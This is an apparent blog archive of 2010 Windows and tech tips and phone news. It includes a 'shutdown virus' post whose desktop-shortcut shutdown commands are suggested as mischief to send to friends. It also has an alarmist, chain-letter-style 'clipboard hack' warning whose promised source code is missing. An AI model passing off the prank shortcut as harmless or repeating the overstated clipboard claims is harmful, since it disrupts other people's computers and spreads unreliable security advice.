10. This window is where you have a chance to save all of the options you have chosen into a project file so that if necessary you may later return and make modifications. I have no need to retain the file, but if you would like to be able to come back to it, by all means choose “Save Self Extraction Directive (SED) file” and tell it where to put it. As always, click Next.


Monday, July 5, 2010

Make a Shutdown Virus

This is an interesting tutorial in which we will create a fake "virus" which can shutdown, restart and log off your pc(Can also write a message and specify the countdown time). This is actually a faster way to turn off your pc, ’cause it doesn’t require clicking START>TURNOFF button etc….And you can always do a little mischief by sending it to your friends ;)
1.Create shortcut,(Right click on your desktop and go to new>shortcut)
2.After this will appear window and that is where you type the code.
shutdown -s -t 300 -c "Your Message" -this will shutdown the computer.
 To log of computer type shutdown -l -t 300 -c "your message"
To restart computer type shutdown -r -t 300 -c " your message"
The number after -t is the number of seconds countdown there will be before shutdown . After -c write own message , that will come up when shutdown box pops up.


3. Type the name for the shortcut and click on finish.
4. After this will appear icon on desktop, when someone clicks it, shutdown box will pop up.

5.How can I stop system shutdown ? Go to Start->Run , then open cmd,write shutdown -a and press ENTER on keyboard, as shown below.

Tuesday, June 29, 2010

Convert Powerpoint Presentations to WMV

Prior to the release of Microsoft Office Powerpoint 2010, users of older versions of PowerPoint such as PowerPoint 2007, PowerPoint 2003, PowerPoint XP, PowerPoint 2000 and PowerPoint 97 will need the help of third-party software . However, for PowerPoint users who want to convert or save the presentation in a video format, PowerPoint 2010 has made it easy.


PowerPoint has been widely used to prepare presentations, animations, slide shows and multimedia for work, commercial, training education, government, leisure and many other purposes. On many occasions, PowerPoint users will want to save the presentations created as a video file, as the presentations in proprietary PowerPoint file formats such as PPT, PPTX, PPS and etc requires a computer with PowerPoint Viewer
By converting the Powerpoint Presentations video, users can upload and share the presentation video slideshow easily on Youtube, Facebook, MySpace and other video sharing sites. Video can also be burned to CD, DVD or Blu-Ray disc for distribution or playback on TV. And video files can be directly played by increasingly popular HD media player for playback on LCD TV.
In PowerPoint 2010, users no longer need any third party software application to save presentations in video format anymore. PowerPoint 2010 includes built-in support to save presentation as Windows Media Video (wmv) format. Windows Media Video encoding is widely supported, thanks to built-in codec support by Windows operating system.Here’s how to save a presentation as WMV video in PowerPoint 2010:
In PowerPoint 2010, click on File tab, then click on Save As. In the “Save As” dialog box, select Windows Media Video in “Save as type” drop down list.
  1. Enter a file name for the video, and click on Save button.
  2. A video creation progress bar will be displayed on PowerPoint’s status bar. Once process completed, the video can be played in




    media player right away.

How to Change and Set Default Font in Word 2010


Microsoft Office Word 2010 default theme style set uses Calibri as body font type and Cambria as headings font type as the default font type. Users can change and set the default font type, font style, font size, font color and other effects to another font settings by following step-by-step guide below.

Note that once the new font style settings is set as default, all new documents created by Word 2010 will use the new font style settings.

How to Change or Customize Default Font Settings in Word 2010
  1. Run microsoft (MS) Office Word 2010.
  2. By default a blank document will be created. If there is no document been opened, create a new blank document by clicking on File -> New and select Blank document.
    Alternatively, open any existing Word document file.
  3. On the Home tab, click on the launcher arrow in the Font dialog box.
    Alternatively, press Ctrl-D.
  4. In the Font tab, change and configure the font, font style, font size, font color, and other settings that want to set as default.
  5. Click on Set As Default button, and then click OK to set the new font style as default for all future new document in Word 2010.

Friday, June 25, 2010

Mercenaries2:World In Flames direct links


Click Here to download
A post related to gamez after a very long time

Saturday, June 19, 2010

Shocking news about CTRL+C clipboard hacking

Ctrl+C may be the most important work we do everyday. But it's not a very safe thing to do. Read on to know why. What happens when you press Ctrl+C while you are online. We do copy various data by Ctrl + C for pasting elsewhere. This copied data is stored in clipboard and is accessible from the net by a combination of Javascripts and ASP. This is called clipboard hack problem.

Just try this:

1. Copy any text by Ctrl + C

2. Click the Link: Clipboard Hack
(in internet explorer or netscape only)

3. You will see the text you copied was accessed by this web page.

Surprised! I know you are because i was also surprised to see it. Do not keep sensitive data (like passwords, credit card numbers, PIN etc.) in the clipboard while surfing the web. It is extremely easy to extract the text stored in the clipboard to steal your sensitive information. Forward this information to as many friends as you can, to save them from online frauds!

It is true, text you last copied for pasting (copy & paste) can be stolen when you visit web sites using a combination of JavaScript and ASP (or PHP, or CGI) to write your possible sensitive data to a database on another server.

How Cipboard Hack is done?

The Clipboard hack is done by the following Source Code:

How to safeguard yourself from Clipboard Hack Problem?

To avoid clipboard hack problem, do the following:

1. Go to internet options->security.

2. Press custom level.

3. In the security settings, select disable under Allow paste operations via script.

Now the contents of your clipboard are safe.

Interestingly, this hack works only on internet explorer, and not on Mozilla Firefox browser. Please forward this article to as many friends as you can to make them aware of this issue with CTRL+C.

Tuesday, June 15, 2010

C Program Without a Main Function

How to write a C program without a main function?. Is it possible to do that. Yes there can be a C program without a main function. Here’s the code of the program without a main function…


#include<stdio.h>
#define decode(s,t,u,m,p,e,d) m##s##u##t
#define begin decode(a,n,i,m,a,t,e)</stdio.h>
int begin()
{
printf(
" hello ");
}
Does the above program run without the main function? Yes, the above program runs perfectly fine even without a main function. But how, whats the logic behind it? How can we have a C program working without main?
Here we are using preprocessor directive #define with arguments to give an impression that the program runs without main. But in reality it runs with a hidden main function.
The ‘##‘ operator is called the token pasting or token merging operator. That is we can merge two or more characters with it.
A Preprocessor is program which processess the source code before compilation.

Look at the 2nd line of program -
#define decode(s,t,u,m,p,e,d) m##s##u##t

What is the preprocessor doing here. The macro decode(s,t,u,m,p,e,d) is being expanded as “msut” (The ## operator merges m,s,u & t into msut). The logic is when you pass (s,t,u,m,p,e,d) as argument it merges the 4th,1st,3rd & the 2nd characters(tokens).

Now look at the third line of the program -
#define begin decode(a,n,i,m,a,t,e)

Here the preprocessor replaces the macro “begin” with the expansion decode(a,n,i,m,a,t,e). According to the macro definition in the previous line the argument must be expanded so that the 4th,1st,3rd & the 2nd characters must be merged. In the argument (a,n,i,m,a,t,e) 4th,1st,3rd & the 2nd characters are ‘m’,'a’,'i’ & ‘n’.

So the third line “int begin” is replaced by “int main” by the preprocessor before the program is passed on for the compiler. That’s it…

The bottom line is there can never exist a C program without a main function. Here we are just playing a gimmick that makes us beleive the program runs without main function, but actually there exists a hidden main function in the program. Here we are using the proprocessor directive to intelligently replace the word begin” by “main”. In simple words int begin=int main.

source-->www.gohacking.com

Saturday, June 12, 2010

How to Change the Logon Screen Background in Windows 7

How would you like to change the logon screen background in Windows 7 so as to give your Windows a customized look and feel? With a small tweak it is possible to customize the Windows 7 logon screen and set your own picture/wallpaper as the background. Changing logon screen background in Windows 7 is as simple as changing your desktop wallpaper. Well here is a step by step instruction to customize the logon screen background.


1. The image you need to set as the background should be a .jpg file and it’s size should not exceed 245KB.
2. The image resolution can be anything of your choice. However I prefer 1440 x 900 or 1024 x 768. You can use any of the photo editing software such as Photoshop to compress and set the resolution for your image. Once you’re done, save this image as backgroundDefault.jpg.
3. You will need to copy this image to
C:\Windows\system32\oobe\info\backgrounds
You will need to create that path if it does not already exist on your computer.
4. Now open the Registry Editor (Start -> Run -> Type regedit) and navigate to the following key
HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\
LogonUI\Background
If Background does not exist rightclick LogonUI, select New and then Key, and then name it Background. Now locate OEMBackground (listed on the right side). If it does not exist, right-click Background and select New and then DWORD and name it OEMBackground.
5. Double-click on OEMBackground and set the Value Data to 1.
6. Now log-off to see the new logon screen background. If you would like to revert back to the default background, just set the Value Data back to 0.
I hope you like this trick. Just try out and give your feedback!

Wednesday, June 9, 2010

Apple unveils iPhone 4 with 720p HD Recording

Highly anticipated smartphone brings video calling, 5 megapixel camera and a stunning display
Apple CEO Steve Jobs kick-started the Worldwide Developers Conference 2010 in San Francisco with the announcement of the next generation iPhone model - iPhone 4. After the infamous Gizmodo and Vietnamese iPhone 4 leak, Apple has stuck to its plans and announced the fourth generation iPhone model. Just like the first generation iPhone was killed when the iPhone 3G was launched, the iPhone 3G will be sold no more. The iPhone 3GS would be sold for $99 with a two years contract.

Clad with wonderful new features, Apple will start selling iPhone 4 starting at $199 with a two years contract in U.S. from June 24. The iPhone 4 would be available in a 16GB version costing $199 and 32GB version costing $299. Before we start off with the details of the iPhone 4, let's get one thing straight about the operating system. Apple has renamed the iPhone OS 4.0 for iPad and iPhone/iPod Touch devices to iOS4. From June 21, the iOS4 upgrade will be available free for all devices.

Design:
The all new iPhone 4 is just 9.3mm thick and is 24 percent thinner than the iPhone 3GS. It's pretty much similar to what we saw in the leaked photos that soared on the web. On the top, the iPhone 4 has a 3.5mm headset jack, secondary mic and the sleep-wake up button. At the bottom, the iPhone 4 sports the primary mic, speaker and Apple's proprietary 30-pin connector port. Of course we have the volume controls on the sides.

Design-wise, Apple drops the rounded hinds design and adopts box like structure for the new iPhone 4 model. Apple has used stainless steel rims for binding the iPhone 4 body. These rims have integrated antennas and act as bonding agents to hold two glass panels on the front and the back of the iPhone 4.
More Info Here
Display:
With the new iPhone 4, Apple debuts new display dubbed as 'Retina Display'. This 3.5-inch multi-touch display offers 960x640 pixel resolution at 326 pixels per inch. This means crisper images and more amazing graphics display while playing games. Apart from that, this IPS technology based panel will offer 800:1 contrast ratio that would be four times better than the previous generation iPhone devices.

So, you can comfortably watch 720p HD movies on this 960x640 pixel display with more accurate colors. Apart from that, both front display and back panel would come coated with fingerprint resistant oleophobic coating.


Processor:
If you can recollect the mysterious Apple A4 System-on-Chip processor used in the iPad, you won't be surprised to discover that Apple has used the same A4 processor on the iPhone 4. Apple claims that this chip is power efficient and hence conserves power to add up to the battery life.

Camera:


Apple has added 5 megapixel sensor with backside illuminated sensor and LED Flash. This new camera will also offer five times digital zoom and tap to focus options. Not only that, this 5 megapixel camera sensor is capable of recording 720p HD video at 30 frames per second. The LED Flash will stay illuminated for recording better quality picture in videos.

The iPhone 4 has a front facing camera that enables video calling dubbed as FaceTime that works even when the Wi-Fi is turned off. No setup or installation is required as FaceTime works out of the box. Apple has built FaceTime using a bunch of open standards like SIP (Session Initiation Protoco), H.264, AAC and so on.

Apple will also introduce new iMovie for iPhone app for video editing that will include options like scene transitions, themes, editable titles, and much more. This app will be available at a price of $5 after iOS4 is rolled out to everyone.

Will iPhone 4 turn out to be a killer of Flip Mino HD and the likes? We'll wait and see.

Gyroscope:
Apple has added three-axis gyroscope, a device maintaining orientation or measuring it based on the rotation mechanism of the object. This, clubbed with Accelerometer on the iPhone 4 makes it capable of 6-axis motion sensing. This is similar to Sony PlayStation 3's game controller which has gyroscopic motion sensing. It's quite possible that in the near future, we may see touchscreen apps supplementing the game controllers.

Battery life:
One of the major issues of all the iPhone users has been the battery life and hence, Apple has put a larger battery in the iPhone 4. The lithium-ion rechargeable battery promises to offer up to 7 hours of talk time on 3G networks and 14 hours of talk time on 2G networks. Also, one can listen to music for 40 hours or watch videos for up to 10 hours. The most amazing part is that users can now browser mobile web for up to 10 hours on the iPhone 4, that is as much as offered by new Intel Atom Pine Trail platform based netbooks.

Bumpers:
Since Apple would be using iPhone 4's outer rims as a part of its antenna system, the company has come out with its own set of cases to protect the iPhone. Apple has introduced iPhone 4 protection cases dubbed as Bumpers that would be available in white, black, green, blue, orange and pink colors. Made out of moulded plastic and rubber, these cases are meant to keep the antenna system as well the glass panels safe.

Other features:
  • Quadband HSDPA/HSUPA
  • Wi-Fi (802.11n)
  • Assisted GPS
  • Accelerometer
  • Digital Compass
  • Bluetooth 2.1 + EDR
  • iBooks App as free download
  • Microsoft's search engine Bing officially added to search engine options.
  • Micro SIM just like the ones used in iPad
Quite a lot of features like multi-tasking and folders utilities will arrive with the iOS4 update for other Apple devices but iPhone 4 will come preloaded with it. The iPhone 4 will require iTunes 9.2 so we can anticipate that iTunes software upgrade in the coming weeks. Apple iPhone 4 will be available in white and black colors. Pre-orders begin on June 15 and phones will start shipping on June 24 in U.S., France, Germany, UK and Japan. Apple will roll out the iPhone 4 to 18 more countries in July, 24 more in August, and 40 more in September. Let's hope that India would be considered during August or at least September roll out of iPhone 4 device. Click Here
Click Here
THE ONLY THING WHICH CAN BE SAID NOW IS THAT APPLE KEEPS REMINDING THAT WHEN IT COMES TO TECHNOLOGY IT HAS NO COMPETITION

Friday, May 28, 2010

NOKIA X2 with 5 megapixel camera at 5000



NEW DELHI: Finnish cellphone maker Nokia has launched a low-priced handset X2 in the Indian market.

The candybar X2 sports a 2.2-inch QVGA screen and weighs 81 grams. The phone packs dual speakers, dedicated music keys, FM stereo and support for up to 16GB of storage via microSD card.

Other key features include Bluetooth 2.1, 3.5mm headphone jack and USB 2.0. The phone runs on Nokia's proprietary S40 OS.

X2 also offers direct access to Facebook from the homescreen and comes with Nokia Messaging for email and Instant Messaging. Other notable feature include instant access to apps from Ovi Store, a 5 megapixel camera and a video recorder.

The phone is priced at Rs 5,000 and is likely to be available from June.

Nokia last week unveiled details of its first phone N8 with new Symbian 3 software, designed to challenge the iPhone and Blackberry at the high-end of the market.

The company cut its profit outlook and delayed the sales launch of Symbian 3 phones until the third quarter, sending its shares sharply lower. "Nokia is reacting to the fire alarm," said Swedbank analyst Jari Honko.

Nokia, which has yet to show the phone to journalists or analysts, is counting on the new software to start clawing back market share lost to the company's new rivals.

However, analysts said the new model and software upgrade at best put Nokia on par with features already available to consumers of Google's Android software, or Sony Ericsson, which has sold a 12-megapixel camera phone since 2009.

"Symbian 3 is evolutionary not revolutionary, but N8, if reliable, is a first step in efforts to make Nokia's high-end phones credible again," said Ben Wood, head of research at CCS Insight.

The new N8 flagship model will have a 12 megapixel camera, 3.5-inch touchscreen and retail for 370 euros ($493), excluding subsidies and taxes, Nokia said in a press release.

Analysts said it was unclear how much of an impact the phone will have on third-quarter results as it goes on sale only in selected markets during the quarter.

"I believe it will slightly calm the markets. It does not solve all of Nokia's problems, but it is an important first step," said Nordea analyst Sami Sarkamies.

Download Data Sheet

Thursday, May 27, 2010

Microsoft Download Manager for Free (Official Direct Download Link)

Microsoft Download Manager is a small application by Microsoft which enables the users to download large files such as an application or multimedia files from the Internet in more reliable and faster way than using a browser alone. The Download Manager has been specifically designed to manage file downloads
from supporting Microsoft Web sites and Web addresses starting with http://.

Features of the Microsoft Download Manager includes:

•Intuitive user interface which shows the status of downloads such as files, percentage complete, status and size.
•Able to pause the download of a file if needed and resume the download later.
•Able to change the number of automatic retries when downloading a file.
•Turning Microsoft Download Manager notifications on or off.
•Able to increase the number of connections the Download Manager makes to increase the speed at which a file is downloaded, up to a maximum of 16 connections.
Microsoft Download Manager works well in most of the Microsoft Operating Systems such as Windows XP SP2, Windows Vista, Windows 7, Windows Server 2003 and Windows Server 2008. The Microsoft Download Manager supports the following Web browsers: Windows Internet Explorer 6, Windows Internet Explorer 7 , Windows Internet Explorer 8, Mozilla Firefox 2 and Mozilla Firefox 3.

Download Microsoft Download Manager version 1.1 (direct download link): MSDownloadManager.msi